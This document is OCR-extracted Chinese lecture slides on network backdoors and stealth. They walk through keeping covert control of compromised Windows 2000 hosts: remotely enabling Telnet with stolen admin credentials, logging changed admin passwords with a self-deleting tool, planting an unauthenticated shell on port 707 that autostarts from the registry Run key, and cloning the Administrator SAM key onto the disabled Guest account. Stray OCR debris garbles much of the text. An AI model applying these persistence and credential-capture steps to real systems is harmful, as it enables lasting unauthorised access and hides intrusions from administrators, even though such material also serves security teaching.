【IT計(jì)算機(jī)】網(wǎng)絡(luò)后門與網(wǎng)絡(luò)隱身

第六章網(wǎng)絡(luò)后門與網(wǎng)絡(luò)隱身

本章目標(biāo)

?為了保持對已經(jīng)入侵的主機(jī)長久的控制，需要在

主機(jī)上建立網(wǎng)絡(luò)后門，以后可以直接通過后門入

侵系統(tǒng)。

?當(dāng)入侵主機(jī)以后，通常入侵者的信息就被記錄在

主機(jī)的日志中，比如IP地址、入侵的時間以及做

了哪些破壞活動等等

?為了入侵的痕跡被發(fā)現(xiàn)，需要隱藏或者清除入侵

的痕跡

?實(shí)現(xiàn)隱身有兩種方法：

-設(shè)置代理跳板

-清除系統(tǒng)日志。

.弋l廠e八1?一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.門「一i-*dIKxloDepartment,QiJd

網(wǎng)絡(luò)后門

?網(wǎng)絡(luò)后門是保持對目標(biāo)主機(jī)長久控制的關(guān)鍵策

略。

?可以通過建立服務(wù)端口和克隆管理員帳號來實(shí)

現(xiàn)。

?留后門的藝術(shù)

?只要能不通過正常登錄進(jìn)入系統(tǒng)的途徑都稱之為網(wǎng)

絡(luò)后I］。

?后門的好壞取決于被管理員發(fā)現(xiàn)的概率。

?只要是不容易被發(fā)現(xiàn)的后門都是好后門。留后門的

原理和選間諜一樣：讓管理員看了感覺沒有任何特

別的。

.弋l廠e八1?一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.門「一i-*dIKxloDepartment,QiJd

案例6-1遠(yuǎn)程啟動Telnet服務(wù)

?利用主機(jī)上的Telnet服務(wù)，有管理員密碼就可以

登錄到對方的命令行，進(jìn)而操作對方的文件系

統(tǒng)。如果Telnet服務(wù)是關(guān)閉的，就不能登錄了。

?默認(rèn)情況下，Windows2000Server的Telnet是

關(guān)閉白勺，可以在運(yùn)行窗口中輸入tlntadmn.exe命

令啟動本地Telnet服務(wù)，如圖6?1所示。

.弋l廠e八1?一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.門「一i-*dIKxloDepartment,QiJd

啟動本地Telnet服務(wù)

?在啟動的DOS窗口中輸入4就可以啟動本地

Telnet服務(wù)了,

區(qū)C:\WINNT\System32\tlntadmn.exe.!□1x

ft<R>Windows2000<TM><內(nèi)部版本號2195)

ServerAdmin<Build5.00.99201.!>

請?jiān)谙铝羞x項(xiàng)中選擇一個:

出

個

應(yīng)

退

這

程

序

告

當(dāng)

出

列

前

用

一

鞭

1)束

結(jié)

盤

個

整

a一

2>示

顯

/置

務(wù)

3)始

服

開

務(wù)

止

4>服

停

請鍵入一個選項(xiàng)的號碼［0-5］以選擇該選項(xiàng)：4

二J

AtAr、.廠E八1?一*.、-rI_?rv^葭I17ArR~t

口口片…T、r-LC,UI網(wǎng)oDepartment,QiJd

遠(yuǎn)程開啟對方的Telnet服務(wù)

?利用工具RTCS.vbe可以遠(yuǎn)程開啟對方的Telnet服

務(wù)，使用該工具需要知道對方具有管理員權(quán)限的用

戶名和密碼。

?命令的語法是：“cscriptRTCS.vbe

09administrator123456123”，

?其中cscript是操作系統(tǒng)自帶的命令

?RTCS.vbe是該工具軟件腳本文件

?I訓(xùn)址是要啟動Telnet的主機(jī)地址

?administrator是用戶名

?123456是密碼

?1是登錄系統(tǒng)的驗(yàn)證方式

?23是Telnet開放的端口

?該命令根據(jù)網(wǎng)絡(luò)的速度，執(zhí)行的時候需要一段時

間，開啟遠(yuǎn)程主機(jī)Telnet服務(wù)的過程如下圖所示。

人自、.rm八I?一,*tI_.rmJivtHoDepartment,QiJd

-ion1.1otb'ti**I*-一Lcru*4Ifxxl

遠(yuǎn)程開啟對方的Telnet服務(wù)

,1□1x|

C：\RTCS>cscriptRTCS.ube09administrator123456123

Microsoft(R)WindowsScriptHostUersion5.6

(C)MicrosoftCorporation1996-2Q01□保留所有權(quán)利□

**x***x***x*******x*******x*******x*************x*x*******x****x**x**xx*

RTCSU1.08

RemoteTelnetConfigureScript,byzzzeuazzz

blelcometouisite

Usage：

cscriptC:\RTCS\RTCS.ubetargetIPusernamepasswordNTLMAuthortelnetport

Itwillautochangestateoftargettelnetseruer.

XXMXMMMMXXXXXXMMMMXMMMMMMMXXXMMMMMMMXMMXMXMMMMXMXXMMXMXXXXMMMMMMXXMXMMMX

Conneting09....

OK?

SettingNTLM=1....

0K?

Settingport=23....

OK?

Queryingstateoftelnetseruer....

Changeingstate....

0K?

TargettelnetseruerhasbeenSTARTSuccessfully?

Now,youcantry：telnet0923,togetashell.

C：\RTCS>

AtAr、.IE/.I.、一tI~177rr^-t

0Q,fl*'Iikrt^F_r4L.Lt?-iLcrGI1x510Department,QiJd

確認(rèn)對話框

?執(zhí)行完成后，對方的Telnet服務(wù)就被開啟了。在DOS提示符

下，登錄目標(biāo)主機(jī)的Telnet服務(wù)，首先輸入命令"Telnet

09,5,因?yàn)門elnet的用戶名和密碼是明文傳遞

的，首先出現(xiàn)確認(rèn)發(fā)送信息對話框，如圖所示。

F'C:\WINfMT\System32\cmd.exe-telnet172.1825.109-in]x

Microsoft(R)Windows2000(TM)版本5,GO(內(nèi)部版本號2195)上

歡迎使用MicrosoftTelnetClient

TelnetClient內(nèi)部版本號5.GO.99203.1

Escape字符為'CTRL+],

您將要發(fā)送密碼信息到Internet區(qū)域中的遠(yuǎn)程計(jì)算機(jī)。這可能不安全。是否還要發(fā)送(y/n)：y

zJ

±1/

A"、.弋l廠e/.Ii一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.門「一i-*dIKxloDepartment,QiJd

登錄Telnet的用戶1名和密碼

■輸入字符“『'，進(jìn)入Telnet的登錄界面，需

要輸入主機(jī)的用戶名和密碼，如圖所示。

-|g|x

NTLMAuthenticationfailedduetoinsufficientcredentials.Pleaseloginwith

cleartextusernameandpassword

Microsoft(R)Windows(TM)Uersion5.00(Build2195)

WelcometoMicrosoftTelnetSeruice

TelnetSeruerBuild5.00.99201.1

login：administrator

password：

A"、.er/.II_?74r7Ar^-t

cmjo白片-”r--卜.門「一i-*dIKxloDepartment,QiJd

登錄Telnet服務(wù)器

■如果用戶名和密碼沒有錯誤，將進(jìn)入對方

主機(jī)的命令行，如圖所示。

A"、.E

卜Zlrrt1*-L,mrCTIUJI''oDepartment,QiJd

記錄管理員口令修改過程

?當(dāng)入侵到對方主機(jī)并得到管理員口令以后，

就可以對主機(jī)進(jìn)行長久入侵了，但是一個好

的管理員一般每隔半個月左右就會修改一次

密碼，這樣已經(jīng)得到的密碼就不起作用了。

?利用工具軟件Win2kPass.exe記錄修改的

新密碼，該軟件將密碼記錄在Winnt\temp

目錄下的Config.ini文件中，有時候文件名

可能不是Config,但是擴(kuò)展名一定是ini,該

工具軟件是有“自殺”的功能，就是當(dāng)執(zhí)行完

畢后，自動刪除自己。

.弋l廠e八1?一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.門「一i-*dIKxloDepartment,QiJd

記錄管理員口令修改過程

?首先在對方操作系統(tǒng)中執(zhí)行Win2KPass.exe文

件，當(dāng)對方主機(jī)管理員密碼修改并重啟計(jì)算機(jī)以

后，就在Winnt\temp目錄下產(chǎn)生一個ini文件，

如圖所示。

C:\WINNT\Temp

L文件（日編輯?查看⑦收藏（Q工具（D幫助3

i*后適▼吟▼山?a搜索?島外快一。房史?西哈冥份|

［理毗切口C：MINNT\T薪；三］口轉(zhuǎn)到

文件夾：D

?口DriverCache

口Fonts.ISTMP1,DIR

?口HelpTemp

[']IISTemporaryCc

SOjava

Config.ini

「IMedia配置要置

S口msagent

SC]msapps修改時間：2003-11-

@口mww32.

大小：111字節(jié)

E回OfflineWebPage

QjRegistration屬性:（正常）

口repair

田＜pnirihw，二

“I2J

類型:配置設(shè)置大?。?11手節(jié)

案例6-3建立Web服務(wù)和Telnet服務(wù)

?使用工具軟件wnc.exe可以在對方的主機(jī)上

開啟兩個服務(wù)：Web服務(wù)和Telnet服務(wù)。其

中Web服務(wù)的端口是808,Telnet服務(wù)的端

口是707。執(zhí)行很簡單，只要在對方的命令

行下執(zhí)行一下wnc.exe就可以，如圖所示。

.弋l廠e八1?一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.門「一i-*dIKxloDepartment,QiJd

建立Web服務(wù)和Telnet服務(wù)

執(zhí)行完畢后，利用命令"netstat?an”來查

看開啟的808和707端口，如圖所示。

因選定C:\WINNT\System32\cmd.exe-1□1x|

C：\wnc>netstat-an

ActiveConnections

J

ProtoLocalAddressForeignAddressState

TCP0.0.0.0210.0.0.00LISTENING

TCP0.0.0.0250.0.0.00LISTENING

TCP0.0.0.0420.0.0.00LISTENING

TCP0.0.0.0530.0.0.00LISTENING

TCP0.0.0.0800.0.0.00LISTENING

TCP0.0.0.01190.0.e.d0LISTENING

TCP0.0.0.01350.0.0.00LISTENING

TCP0.0.0.04430.0.0.00LISTENING

TCP0.0.0.04450.0.0.00LISTENING

TCP0.0.0.05630.0.0.00LISTENING

TCP0.0.0.0：：707:0LISTENING

TCP0.0.0.0：：808加XKMLISTENING

TCP0.0.0.0：10250.0.0.0:0LISTENING

TCP0.0.0.0：10260.0.0.0:0LISTENING

TCP0.0.0.0：10290.0.0.0:0LISTENING

TCP0.0.0.0：10300.0.0.0:0LISTENING二J

測試Web服務(wù)

?說明服務(wù)端口開啟成功，可以連接該目標(biāo)主機(jī)提供的這兩

個服務(wù)了。首先測試Web服務(wù)808端口，在瀏覽器地址欄

中輸入72J8.25.109:808”，出現(xiàn)主機(jī)的盤符列

表，如圖所示。

,mjo白片-”r--卜.門「一i-*dIKxl

看密碼修改記錄文件

?可以下載對方硬盤設(shè)置光盤上的任意文件（對于

漢字文件名的文件下載有問題），可以到

Winnt/temp目錄下查看對方密碼修改記錄文件,

如圖所示。

,mjo口片-”r--卜.門「一lc八二dIKxl

利用telnet命令連接707端口

?可以利用“telnet09707”命令登

錄到對方的命令行，執(zhí)行的方法如圖所示。

.弋l廠e八1?一*.、一》I一.rr-^/.Ar7AR~t

cmjo白片-”r--卜.門「一i-*dIKxloDepartment,QiJd

登錄到對方的命令行

-不用任何的用戶名和密碼就可以登錄對對

方主機(jī)的命令行，如圖所示。

,1□!x

MicrosoftWindows2000[Uersion5.00.2195]

(C1985-1998MicrosoftCorp.

C：\wnc>ipconfig

Windows2000IPConfiguration

Ethernetadapter本地連接：

Connection-specificDNSSuffix

IPAddress09

SubnetMask

DefaultGateway

C：\wnc>

A"、.er/.ItI_-177r

cmjoa片-"r--卜.門「一i-*dIKxloDepartment,QiJd

自啟動程序

?通過707端口也可以方便的獲得對方的管理

員權(quán)限。

?wncexe的功能強(qiáng)大，但是該程序不能自動

加載執(zhí)行，需要將該文件加到自啟動程序列

表中。

?一般將wnc.exe文件放到對方的winnt目錄

或者winnt/system32目下，這兩個目錄是

系統(tǒng)環(huán)境目錄，執(zhí)行這兩個目錄下的文件不

需要給出具體的路徑。

.弋l廠e八1?一*.、一》I一./.Ar7AR~t

cmjo白片-”r--卜.門「一i-*dIKxloDepartment,QiJd

將wncexe力口至U自啟動歹U表

?首先將wncwxe和regwxe文件拷貝對方的winnt目錄下，

利用regwxe文件將wncwxe加載到注冊表的自啟動項(xiàng)目

中，命令的格式為：

?fifireg.exeadd

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio

n\Run/vservice/dwncwxe”執(zhí)行過程如圖所示。

BC:\WINNT\System32\cmd.exe

2

C：\>reg.exeaddHKLMXSOFTWAREMIicrosoft\Windows\CurrentUersionXRunZuserviceZd-1

wnc.exe

操作成功結(jié)束

c：\>.

d

cmjo白片-”r--卜.門「一i-*dIKxl

修改后的注冊表

?如果可以進(jìn)入對方主機(jī)的圖形界面，可以

查看一下對方的注冊表的自啟動項(xiàng)，已經(jīng)

被修改，如圖所示。

案例6-4讓禁用的Guest具有管理權(quán)限

?操作系統(tǒng)所有的用戶信息都保存在注冊表

中，但是如果直接使用“regedit”命令打開

注冊表，該鍵值是隱藏的，如圖所示。

,mjo白片-”r--卜.門「一i-*dIKxl

查看winlogon.exe的進(jìn)程號

?可以利用工具軟件psu.exe得到該鍵值的查看和

編輯權(quán)。將psu.exe拷貝對方主機(jī)的C盤下，并在

任務(wù)管理器查看對方主機(jī)winlogon.exe進(jìn)程的ID

號或者使用pulist.exe文件查看該進(jìn)程的ID號，

如圖Hlzj、。口Windows任務(wù)管理器injjcj

文件(￡)選項(xiàng)⑼查看M幫助M)

應(yīng)用程序進(jìn)程|性能|

映像名稱1PIDCPUICPU時間|內(nèi)存使用I.

SystemIdleP...0991:07:3316K

System8000：00：53272K

smss.exe168000:00:05360K

winlogon.exe192000:00：orr2,000K

csrss.exe196000:00:29708K

services,exe248000:00:075,092K

Isass.exe260000:00:034,824K

svchost.exe300000:00:002,484K

svchost.exe432000:00:002,364K

spoolsv.exe460000:00:003,112K

conime.exe492000:00:00948K

msdtc.exe500000:00:003,360K

tcpsvcs.exe620000:00:014,056K

svchost.exe636000:00:014,332K

llssrv.exe668000:00:011,876K

regsvc.exe712000:00:00884K

termsrv.exe716000:00:002,796K

MSTask.exe724000:00:001,944K

nnnnn-nnin/invzl

廠顯示所有用戶的進(jìn)程⑤)結(jié)束進(jìn)程四)

,mjo白片-”r--卜.門「一i-*dIKxl

執(zhí)行命令

?該進(jìn)程號為192,下面執(zhí)行命令"psu?p

regedit-ipicT其中pid為Winlogon.exe的

進(jìn)程號，如圖所示。

^Jc：\WINNT\System32\cmd.exe

C：\>psu-ppegedit-i192.

112b

A"、.弋l廠e/.Ii一*.、一》I一.rr-^/.Ar7AR~t

cmjo?卜.門「一i-*dIKxloDepartment,QiJd

查看SAM鍵值

?在執(zhí)行該命令的時候必須將注冊表關(guān)閉，

執(zhí)行完命令以后，自動打開了注冊表編輯

器，查看SAM下的鍵值，如圖所示。

,mjo白片-”r--卜.門「一i-*dIKxl

查看帳戶對應(yīng)的鍵值

?查看Administrator和guest默認(rèn)的鍵值，在

Windows2000操作系統(tǒng)上，Administrator一般

為0x1f4,guest一般為0x1f5,如圖所示。

原注冊表編輯器

注冊表（￡）編輯（日查看（玲收藏（E）幫助（LD

S-nHKEY_LOCAL_MACHINE^1名稱'類型____________1數(shù)據(jù)

0OHARCWARE勵（默認(rèn)）0xlf4（長度為零的二進(jìn)位值）

BLJsAM

BCJsAM

E3CIDomains

E3C-JAccount

E)C-JAliases

由LlGroups

BL_]Users

I000001F4

fl000001F5

Cl000003E8

口000003E9

Ll000003EA

Cl000003EF

r-Cj000003F0―

r~l000003F1

；1000003F2

Cl000003F3

■1000003F4

1000003F5

1-1000003F6

BLJNames

<IAdmin

11Guest▼I|<|1>1

-r*.?-J

cmjo白片-”r--卜.門「一i-*dIKxl

帳戶配置信息

?根據(jù)"0x1f4”和“0x1f5”找到Administrator

和guest帳戶的配置信息，血圖所示。

拷貝管理員配置信息

?在圖右邊欄目中的F鍵值中保存了帳戶的密碼信

息，雙擊“000001F4”目錄下鍵值“F”，可以看到

該鍵值的二進(jìn)制信息，將這些二進(jìn)制信息全選，

并拷貝到出來，如圖所示。

'*附田京i八LAIAAAZ-l-iTRICAUAUAAA，C?Ac-I，—》一*CCCCCICA

cmjo白片-”r--卜.門「一i-*dIKxl

覆蓋Guest用戶的配置信息

?將拷貝出來的信息全部覆蓋到“000001F5”

目錄下的“。鍵值中，如圖所示。

圖注通表獎輯思.!□1x|

編輯二進(jìn)制數(shù)值

注表?編錯電互手3X

□_|HKEY_LOCAL_M,數(shù)值名稱加I：數(shù)據(jù)_____________________________

[+-_1HARDWARE（數(shù)值未設(shè)置）

日CJ5AM

數(shù)值數(shù)據(jù)包）:020001000000000000000000C

日口SAM

oo00O2OOO1OOOOOOOO0O000000009c000000020001009

EnDomoo08OOOOOOOOOOOOOO0O

HdIoo10OOOOOOOOOOOOOO0O

oo18OOOOOOOOOOOOOO0O

SIoo20FFFFFFFFFFFFFF7F

SLoo289486BEFO79BOC301

自Loo30F5O1OOOOO1O2OO0O剪切①

oo3815O2OOOOOOOOOO0O復(fù)制（0

oo401AOOOOOOOOOOOO0O

oo48OOOOOOOOOOOOOO0O粘貼（E）

刪除（8

0050

全選⑷

確定取消|

；J0UUUD3FI""-?「"121

^0O^te\HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\OOOOOlF5/

/rA-、.rr^t八I?—*.、一》I>rr^t八Irtf-rrt-t■i

「C/1。口片?kzir仆『-ILSLCL,LC,dI"*fx>.IoDepartment,QiJd

保存鍵值

?Guest帳戶已經(jīng)具有管理員權(quán)限了。為了能夠使Guest帳戶

在禁用的狀態(tài)登錄，下一步將Guest帳戶信息導(dǎo)出注冊表。

選擇User目錄，然后選擇菜單欄“注冊表”下的菜單項(xiàng)“導(dǎo)出

注冊表文件”，將該鍵值保存為一個配置文件，如圖所示。

,mjo白片-”r--卜.門「一i-*dIKxl

刪除Guest帳戶信息

?打開計(jì)算機(jī)管理對話框，并分別刪除Guest

和“00001F5”兩個目錄，如圖所示。

?！员砭庉嬈?/p>

注冊表?編雕查看①收藏6注雌）

S□Aliases:裝.

默

S□GroupsREG_5Z

:

HUUsersREG.BINAR^

I000001F4/

REG_BINAR\

=003o0o|o0o0o

OOOOO

ooooo

ooooo

ooooo

OOOOO

00000：復(fù)制項(xiàng)名稱?

000003T3

000003F411

我的電腦IHKEYLOCALMACHINE\SAM\5AM\Domains^ccounttUser$\000001F5

OCl'fl-"l^fk—HL.LICLeerb-4IfXXI

刷新用戶列表

?這個刷新對方主機(jī)的用戶列表，會出現(xiàn)用

戶找不到的對話框，如圖所示。

cmjo?卜.門「一lc八、dIKxl

修改Guest帳戶的屬性

?然后再將剛才導(dǎo)出的信息文件，再導(dǎo)入注冊表。再刷新用

戶列表就不在出現(xiàn)該對話框了。

■下面在對方主機(jī)的命令行下修改Guest的用戶屬性，注

意：一定要在命令行下。

?首先修改Guest帳戶的密碼，比如這里改成“123456”，并

將Guest帳戶開啟和停止，如圖所示。

WlC:\WINNT\System32\cmd.exe

C：\>netuserguest123456

命令成功完成。

C：\>netuserguestZactiue：yes

命令成功完成。

C：\>netuserguest/actiue：no

命令成功完成。

C2.

cmjo白片-”r--卜.門「一i-*dIKxl

查看guest帳方屬性

?再查看一下計(jì)算機(jī)管理窗口中的Guest帳

戶，發(fā)現(xiàn)該帳戶使禁用的，如圖所示。

烏計(jì)菖機(jī)管理,!□1x|

操作（④查看也）仁?|國畫Ix富晶基

樹|名稱1全名描述

愛Admin

叁計(jì)算機(jī)管理（本地）

E簸系統(tǒng)工具^Administrator管理計(jì)篁機(jī)（域）的內(nèi)置帳戶

出塞|］事件查看器IE編uest供來賓訪問計(jì)算機(jī)或訪問域的內(nèi).

電典系統(tǒng)信息IEHacker

S艇性能日志和警報(bào)

Hacker123

由u共享文件夾堂hax

設(shè)備管理器fHHHH

4HHHH

S?本地用戶和組

色lAMHackerlAMHacker

tJ用戶■￡IUSR_ADSER...Internet來賓帳號匿名訪問Internet信息服務(wù)的內(nèi),,

口組

￡IWAM_ADSE...啟動IIS進(jìn)程帳號啟動進(jìn)程之外的應(yīng)用程序的Inter,

E為存儲國

qinglOqinglO

□磁盤管理

堂szgszg

好磁盤碎片整理程序

￡TsInternetUser

TsInternetUser這個用戶帳戶被終端服務(wù)所使用。

日邏輯驅(qū)動器

卬聞可移動存儲zJ__________I±1

利用禁用的guest帳戶登錄

?注銷退出系統(tǒng)，然后用用戶名：“guest”,

密碼：“123456”登錄系統(tǒng)，如圖所示。

"Windkyws2ooo

穗基一，'IAdvancedServer

用尸名(V):Iguest

密碼化):|******

選項(xiàng)?)

cmjo白片-”r--卜.門「一lc八、dIKxl

連接終端服務(wù)的軟件

?終端服務(wù)是Windows操作系統(tǒng)自帶的，可以遠(yuǎn)程通過圖

形界面操縱服務(wù)器。在默認(rèn)的情況下終端服務(wù)的端口號是

3389o可以在系統(tǒng)服務(wù)中查看終端服務(wù)是否啟動，如圖

所示。

噎展務(wù)

操作查看⑦|1■?|蠹畫|囪'國隰|醇|>■H->______________

樹II名稱/I描述I狀態(tài)I啟